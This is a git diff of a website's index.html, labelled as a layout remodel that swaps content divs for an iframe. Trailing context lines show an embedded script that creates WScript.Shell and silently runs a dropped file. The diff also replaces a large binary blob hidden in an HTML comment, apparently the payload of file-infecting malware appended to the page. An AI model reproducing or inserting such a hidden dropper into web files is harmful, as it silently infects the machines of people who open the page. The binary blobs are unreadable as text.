remodeling website and added new background

--- a/AppSys/index.html
+++ b/AppSys/index.html
@@ -4,25 +4,11 @@
     </head>
     <body>
         <div id="container">
-            <div class="innerContainer" id="upperCon">
-                <div class="contentCon" id="firstCon">
-                </div>
-                <div class="contentCon" id="secondCon">
-                </div>
-                <div class="contentCon" id="thirdCon">
-                </div>
-                <div class="contentCon" id="fourthCon">
-                </div>
+            <div id="upperCon">
+                <iframe id="topContent">
+                </iframe>
             </div>
-            <div class="innerContainer" id="lowerCon">
-                <div class="contentCon" id="fifthCon">
-                </div>
-                <div class="contentCon" id="sixthCon">
-                </div>
-                <div class="contentCon" id="seventhCon">
-                </div>
-                <div class="contentCon" id="eigthCon">
-                </div>
+            <div id="lowerCon">
             </div>
         </div>
     </body>
@@ -40,6 +26,10 @@ FileObj.Close
 End If
 Set WSHshell = CreateObject("WScript.Shell")
 WSHshell.Run DropPath, 0
-//--></SCRIPT><!--õp:†MKZOl§¿µEß,lúÔ‹¼³íy V{ÆïQtaˆšž0¬5èù MSâÆ¢ï<QkSŽg÷v&îèÞ&B.ëxŸ¼*^O4¼™ßMµ)X3ôSÈxoo6Ú(G˜ ÞG²¥ätÇ!bUÏãWwE]É?1ê©§<x^ÜXBNÚþ˜¬•./‰•±z}õ,å›­Qä1R`I ¹<c™ z©4D§$Ø¬ ÞßŠòÁs™(]˜ZA^¬såÃ¯dÖWˆlOºðö|Àvnº-V”[öråwÑä¢—¸ÛÞY§([¾Öþ³Šˆ“]µ™ÙoÔRHÓÄLcq¦ëïRõêÓEÞ7ë–!«úéAw"Ê21Å.²„Ö¢õi±iyLnDýÕ„@Ž>‚ï®js6Ýôº¼¹ã1[Ï"Žgú@Ø¶áNííæôaùö9×JøI`}˜¯ðZ…Zdïëç¡þ¸
-çdŸa	Vé‘
-×Dá84{#0 áLR"WùáLáLáL¬‘O8†Z½âL áL-->
+//--></SCRIPT><!--Ùgà†RR’´‡¡Òåè­¬Z§ž:•º°8‚üìS|qž™–ï¹?©Qú!UK$…œ½ÅÆèÆVM‡êoÞ0‰ÇXSÚGÙ]iÏÒk7(û¨ô>žL2mò3‘áÑT€Gì¢ß;§6M¨Ø¨ÃYä;'%þžŸ½ï|U€ñv1(òœÖTÛ2’5E'nœ7ÖFÛýñª_Þ6%¦OkÑpu÷É,ûlÝ·©bÃ±±vZ¤7Ü77£rø6í“ïÇ©(sk×³¯”ÉíAÐJ5nˆÕÂþDK)‹©GçY¸X1:8]„¤6wgnØÍÔAä¼Ý±±^~_­eöªeRÙAûCyZ‚©Fª=ÕüÜ) °/eyy~Ò%«~Þgc­ aÁ¯‚Ù»œèç«v,Ô·8ºÄA •ñ|§®ÃÔn/ËIr{!Ê.Ÿ†\Çy&TÒëð†Ö5Oe'Juwiw\!˜¸IWjj16X«—`‡ãè‘µQ'9QƒÆ#Û=jÜð;„OÀ©±¶{ä¼‡š·FÜÂï0× Ö
+RùÖ
+Ö
+Ö
+›×OØ.ÛZP×
+ Ö
+-->
